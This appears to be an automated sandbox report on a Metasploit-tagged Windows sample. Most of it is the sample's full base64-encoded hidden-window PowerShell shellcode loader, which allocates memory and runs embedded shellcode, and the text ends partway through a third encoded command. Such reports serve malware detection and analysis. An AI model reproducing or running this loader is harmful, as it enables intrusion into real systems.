Analysis Overview
SHA256
eeb8950a9f33f84e8442a000383f133bcf6907448fe31d7f81595238d9726d36
Threat Level: Known bad
The file eeb8950a9f33f84e8442a000383f133bcf6907448fe31d7f81595238d9726d36 was found to be: Known bad.
Malicious Activity Summary
MetaSploit
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-04-19 16:46
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-19 16:46
Reported
2024-04-19 16:49
Platform
win7-20240221-en
Max time kernel
131s
Max time network
141s
Command Line
Signatures
MetaSploit
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe
"C:\Users\Admin\AppData\Local\Temp\9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAA3AHkAVwB4ACAAPQAgACcAJABNAGcAUwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABNAGcAUwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAOQA3ACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwA1ACwAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADcAMAAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4AGUANwAsADAAeAA2AGMALAAwAHgAYwBhACwAMAB4ADMAMAAsADAAeABmAGIALAAwAHgAOQA5ACwAMAB4ADgANQAsADAAeABiAGIALAAwAHgAMAAzACwAMAB4ADUAYQAsADAAeABmAGEALAAwAHgAOABhACwAMAB4AGQAMQAsADAAeAAzAGUALAAwAHgANwAxACwAMAB4AGIAZQAsADAAeABlADUALAAwAHgAMwA3ACwAMAB4ADYAMAAsADAAeABiADQALAAwAHgANQA3ACwAMAB4ADQANAAsADAAeABlADAALAAwAHgAOQA5ACwAMAB4ADQAMwAsADAAeAA2ADUALAAwAHgAMAA5ACwAMAB4ADkANgAsADAAeAAxADkALAAwAHgAYQBkACwAMAB4AGYAYQAsADAAeAAxAGUALAAwAHgAOQA3ACwAMAB4ADgAYgAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeABlADgALAAwAHgANQA0ACwAMAB4ADUAZAAsADAAeABkADEALAAwAHgAMwBjACwAMAB4AGIANwAsADAAeAA1AGMALAAwAHgAMQBhACwAMAB4ADMAMQAsADAAeABiADYALAAwAHgAOQA5ACwAMAB4AGUAZAAsADAAeAAzAGYALAAwAHgANQA3ACwAMAB4ADcANwAsADAAeAA2ADYALAAwAHgAZQBkACwAMAB4AGIANwAsADAAeABmADMALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABlAGYALAAwAHgAMAAyACwAMAB4ADYAYQAsADAAeABjADUALAAwAHgANABmACwAMAB4ADcAZAAsADAAeAAwAGYALAAwAHgAMQBhACwAMAB4ADMAYgAsADAAeAAzADEALAAwAHgAMABlACwAMAB4ADQAYgAsADAAeAA5ADQALAAwAHgANAAyACwAMAB4ADQAOAAsADAAeAA0AGIALAAwAHgAMQA0ACwAMAB4ADgANgAsADAAeABlADMALAAwAHgAYwAzACwAMAB4ADAAZQAsADAAeABhAGQALAAwAHgAMwBhACwAMAB4AGEANwAsADAAeAAxADIALAAwAHgAOQBjACwAMAB4ADQAMwAsADAAeAAwADEALAAwAHgAZQAwACwAMAB4AGUAYQAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUANQAsADAAeAAwADMALAAwAHgANAA5ACwAMAB4AGEAYQAsADAAeAA1ADcALAAwAHgANQBiACwAMAB4ADYAYQAsADAAeAA1ADIALAAwAHgAMgAyACwAMAB4ADkANwAsADAAeAA4ADgALAAwAHgAZQBmACwAMAB4ADMANQAsADAAeAA2AGMALAAwAHgAZgAyACwAMAB4ADIAYgAsADAAeABiADMALAAwAHgANwAzACwAMAB4ADUANAAsADAAeABiADgALAAwAHgANgAzACwAMAB4ADUAMAAsADAAeAA2ADQALAAwAHgANgBkACwAMAB4AGYANQAsADAAeAAxADMALAAwAHgANgBhACwAMAB4AGQAYQAsADAAeAA3ADEALAAwAHgANwBiACwAMAB4ADYAZgAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4AGYANwAsADAAeAA4AGIALAAwAHgANQA2ACwAMAB4ADUAOQAsADAAeABkADgALAAwAHgAMQBkACwAMAB4ADIAYwAsADAAeAA3AGUALAAwAHgAZgBjACwAMAB4ADQANgAsADAAeABmADcALAAwAHgAMQBmACwAMAB4AGEANQAsADAAeAAyADIALAAwAHgANQA2ACwAMAB4ADEAZgAsADAAeABiADUALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAA4ADUALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeAA1AGUALAAwAHgAYgA5ACwAMAB4ADMAZAAsADAAeABjADEALAAwAHgANQBmACwAMAB4AGUANwAsADAAeABhADkALAAwAHgAMABkACwAMAB4AGEAZAAsADAAeAAxADgALAAwAHgAMgBhACwAMAB4ADEAYQAsADAAeABhADYALAAwAHgANgBiACwAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAMQBjACwAMAB4AGUANAAsADAAeAAxADAALAAwAHgANABlACwAMAB4AGIAYQAsADAAeABmADMALAAwAHgAMgAxACwAMAB4ADUAOAAsADAAeAAzAGQALAAwAHgAMgBiACwAMAB4ADgAOQAsADAAeAAwADkALAAwAHgAYwAwACwAMAB4AGMAYwAsADAAeABlAGEALAAwAHgAMAAwACwAMAB4ADAANgAsADAAeAA5ADgALAAwAHgAYgBhACwAMAB4ADMAYQAsADAAeABhAGYALAAwAHgAYQAxACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQAwACwAMAB4ADcANAAsADAAeABjAGMALAAwAHgAYgAxACwAMAB4AGMANgAsADAAeABiADcALAAwAHgAYgA5ACwAMAB4AGMANwAsADAAeAAxAGUALAAwAHgANQAwACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAMAAxACwAMAB4ADMAMAAsADAAeAAzADUALAAwAHgAMgAxACwAMAB4ADYAZAAsADAAeAA2ADAALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeABjAGQALAAwAHgAZAAwACwAMAB4AGQANgAsADAAeABhAGUALAAwAHgAYQA1ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAOQAxACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAMwAzACwAMAB4AGIAYQAsADAAeAA3AGYALAAwAHgAYQBiACwAMAB4AGUAYQAsADAAeAA5ADIALAAwAHgAMQA3ACwAMAB4ADUAMgAsADAAeABiADcALAAwAHgANgA5ACwAMAB4ADgANgAsADAAeAA5AGIALAAwAHgANgBkACwAMAB4ADEANAAsADAAeAA4ADgALAAwAHgAMQAwACwAMAB4ADgAMgAsADAAeABlADgALAAwAHgANAA2ACwAMAB4AGQAMQAsADAAeABlAGYALAAwAHgAZgBhACwAMAB4ADMAZQAsADAAeAAxADEALAAwAHgAYgBhACwAMAB4AGEAMQAsADAAeABlADgALAAwAHgAMgBlACwAMAB4ADEAMAAsADAAeABjAGYALAAwAHgAMQA0ACwAMAB4AGIAYgAsADAAeAA5AGYALAAwAHgANAA2ACwAMAB4ADQAMwAsADAAeAA1ADMALAAwAHgAYQAyACwAMAB4AGIAZgAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADUAZAAsADAAeABlAGEALAAwAHgAYgA4ACwAMAB4ADMANQAsADAAeABjADgALAAwAHgANQA1ACwAMAB4AGQANgAsADAAeAAzADkALAAwAHgAMQBjACwAMAB4ADUANgAsADAAeAAyADYALAAwAHgANgBjACwAMAB4ADcANgAsADAAeAA1ADYALAAwAHgANABlACwAMAB4AGMAOAAsADAAeAAyADIALAAwAHgAMAA1ACwAMAB4ADYAYgAsADAAeAAxADcALAAwAHgAZgBmACwAMAB4ADMAOQAsADAAeAAyADAALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAOQA1ACwAMAB4ADAANQAsADAAeAA2ADkALAAwAHgAOQA2ACwAMAB4AGMAMAAsADAAeAA2ADIALAAwAHgAMwA2ACwAMAB4ADYAOQAsADAAeAAyADcALAAwAHgANwAzACwAMAB4ADAAYQAsADAAeABiAGMALAAwAHgAMAAxACwAMAB4ADAAMQAsADAAeAA2ADIALAAwAHgANwBjADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABBAEIAVAB1AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABBAEIAVAB1AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABBAEIAVAB1ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQANwB5AFcAeAApACkAOwAkAGMARgBTACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQwBnAFYAegAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABDAGcAVgB6ACAAJABjAEYAUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABjAEYAUwAgACQAZQAiADsAfQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -window hidden -EncodedCommand JAA3AHkAVwB4ACAAPQAgACcAJABNAGcAUwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABNAGcAUwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAOQA3ACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwA1ACwAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADcAMAAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4AGUANwAsADAAeAA2AGMALAAwAHgAYwBhACwAMAB4ADMAMAAsADAAeABmAGIALAAwAHgAOQA5ACwAMAB4ADgANQAsADAAeABiAGIALAAwAHgAMAAzACwAMAB4ADUAYQAsADAAeABmAGEALAAwAHgAOABhACwAMAB4AGQAMQAsADAAeAAzAGUALAAwAHgANwAxACwAMAB4AGIAZQAsADAAeABlADUALAAwAHgAMwA3ACwAMAB4ADYAMAAsADAAeABiADQALAAwAHgANQA3ACwAMAB4ADQANAAsADAAeABlADAALAAwAHgAOQA5ACwAMAB4ADQAMwAsADAAeAA2ADUALAAwAHgAMAA5ACwAMAB4ADkANgAsADAAeAAxADkALAAwAHgAYQBkACwAMAB4AGYAYQAsADAAeAAxAGUALAAwAHgAOQA3ACwAMAB4ADgAYgAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeABlADgALAAwAHgANQA0ACwAMAB4ADUAZAAsADAAeABkADEALAAwAHgAMwBjACwAMAB4AGIANwAsADAAeAA1AGMALAAwAHgAMQBhACwAMAB4ADMAMQAsADAAeABiADYALAAwAHgAOQA5ACwAMAB4AGUAZAAsADAAeAAzAGYALAAwAHgANQA3ACwAMAB4ADcANwAsADAAeAA2ADYALAAwAHgAZQBkACwAMAB4AGIANwAsADAAeABmADMALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABlAGYALAAwAHgAMAAyACwAMAB4ADYAYQAsADAAeABjADUALAAwAHgANABmACwAMAB4ADcAZAAsADAAeAAwAGYALAAwAHgAMQBhACwAMAB4ADMAYgAsADAAeAAzADEALAAwAHgAMABlACwAMAB4ADQAYgAsADAAeAA5ADQALAAwAHgANAAyACwAMAB4ADQAOAAsADAAeAA0AGIALAAwAHgAMQA0ACwAMAB4ADgANgAsADAAeABlADMALAAwAHgAYwAzACwAMAB4ADAAZQAsADAAeABhAGQALAAwAHgAMwBhACwAMAB4AGEANwAsADAAeAAxADIALAAwAHgAOQBjACwAMAB4ADQAMwAsADAAeAAwADEALAAwAHgAZQAwACwAMAB4AGUAYQAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUANQAsADAAeAAwADMALAAwAHgANAA5ACwAMAB4AGEAYQAsADAAeAA1ADcALAAwAHgANQBiACwAMAB4ADYAYQAsADAAeAA1ADIALAAwAHgAMgAyACwAMAB4ADkANwAsADAAeAA4ADgALAAwAHgAZQBmACwAMAB4ADMANQAsADAAeAA2AGMALAAwAHgAZgAyACwAMAB4ADIAYgAsADAAeABiADMALAAwAHgANwAzACwAMAB4ADUANAAsADAAeABiADgALAAwAHgANgAzACwAMAB4ADUAMAAsADAAeAA2ADQALAAwAHgANgBkACwAMAB4AGYANQAsADAAeAAxADMALAAwAHgANgBhACwAMAB4AGQAYQAsADAAeAA3ADEALAAwAHgANwBiACwAMAB4ADYAZgAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4AGYANwAsADAAeAA4AGIALAAwAHgANQA2ACwAMAB4ADUAOQAsADAAeABkADgALAAwAHgAMQBkACwAMAB4ADIAYwAsADAAeAA3AGUALAAwAHgAZgBjACwAMAB4ADQANgAsADAAeABmADcALAAwAHgAMQBmACwAMAB4AGEANQAsADAAeAAyADIALAAwAHgANQA2ACwAMAB4ADEAZgAsADAAeABiADUALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAA4ADUALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeAA1AGUALAAwAHgAYgA5ACwAMAB4ADMAZAAsADAAeABjADEALAAwAHgANQBmACwAMAB4AGUANwAsADAAeABhADkALAAwAHgAMABkACwAMAB4AGEAZAAsADAAeAAxADgALAAwAHgAMgBhACwAMAB4ADEAYQAsADAAeABhADYALAAwAHgANgBiACwAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAMQBjACwAMAB4AGUANAAsADAAeAAxADAALAAwAHgANABlACwAMAB4AGIAYQAsADAAeABmADMALAAwAHgAMgAxACwAMAB4ADUAOAAsADAAeAAzAGQALAAwAHgAMgBiACwAMAB4ADgAOQAsADAAeAAwADkALAAwAHgAYwAwACwAMAB4AGMAYwAsADAAeABlAGEALAAwAHgAMAAwACwAMAB4ADAANgAsADAAeAA5ADgALAAwAHgAYgBhACwAMAB4ADMAYQAsADAAeABhAGYALAAwAHgAYQAxACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQAwACwAMAB4ADcANAAsADAAeABjAGMALAAwAHgAYgAxACwAMAB4AGMANgAsADAAeABiADcALAAwAHgAYgA5ACwAMAB4AGMANwAsADAAeAAxAGUALAAwAHgANQAwACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAMAAxACwAMAB4ADMAMAAsADAAeAAzADUALAAwAHgAMgAxACwAMAB4ADYAZAAsADAAeAA2ADAALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeABjAGQALAAwAHgAZAAwACwAMAB4AGQANgAsADAAeABhAGUALAAwAHgAYQA1ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAOQAxACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAMwAzACwAMAB4AGIAYQAsADAAeAA3AGYALAAwAHgAYQBiACwAMAB4AGUAYQAsADAAeAA5ADIALAAwAHgAMQA3ACwAMAB4ADUAMgAsADAAeABiADcALAAwAHgANgA5ACwAMAB4ADgANgAsADAAeAA5AGIALAAwAHgANgBkACwAMAB4ADEANAAsADAAeAA4ADgALAAwAHgAMQAwACwAMAB4ADgAMgAsADAAeABlADgALAAwAHgANAA2ACwAMAB4AGQAMQAsADAAeABlAGYALAAwAHgAZgBhACwAMAB4ADMAZQAsADAAeAAxADEALAAwAHgAYgBhACwAMAB4AGEAMQAsADAAeABlADgALAAwAHgAMgBlACwAMAB4ADEAMAAsADAAeABjAGYALAAwAHgAMQA0ACwAMAB4AGIAYgAsADAAeAA5AGYALAAwAHgANAA2ACwAMAB4ADQAMwAsADAAeAA1ADMALAAwAHgAYQAyACwAMAB4AGIAZgAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADUAZAAsADAAeABlAGEALAAwAHgAYgA4ACwAMAB4ADMANQAsADAAeABjADgALAAwAHgANQA1ACwAMAB4AGQANgAsADAAeAAzADkALAAwAHgAMQBjACwAMAB4ADUANgAsADAAeAAyADYALAAwAHgANgBjACwAMAB4ADcANgAsADAAeAA1ADYALAAwAHgANABlACwAMAB4AGMAOAAsADAAeAAyADIALAAwAHgAMAA1ACwAMAB4ADYAYgAsADAAeAAxADcALAAwAHgAZgBmACwAMAB4ADMAOQAsADAAeAAyADAALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgAOQA1ACwAMAB4ADAANQAsADAAeAA2ADkALAAwAHgAOQA2ACwAMAB4AGMAMAAsADAAeAA2ADIALAAwAHgAMwA2ACwAMAB4ADYAOQAsADAAeAAyADcALAAwAHgANwAzACwAMAB4ADAAYQAsADAAeABiAGMALAAwAHgAMAAxACwAMAB4ADAAMQAsADAAeAA2ADIALAAwAHgANwBjADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABBAEIAVAB1AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABBAEIAVAB1AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABBAEIAVAB1ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQANwB5AFcAeAApACkAOwAkAGMARgBTACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAQwBnAFYAegAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABDAGcAVgB6ACAAJABjAEYAUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABjAEYAUwAgACQAZQAiADsAfQA=
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABNAGcAUwAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4A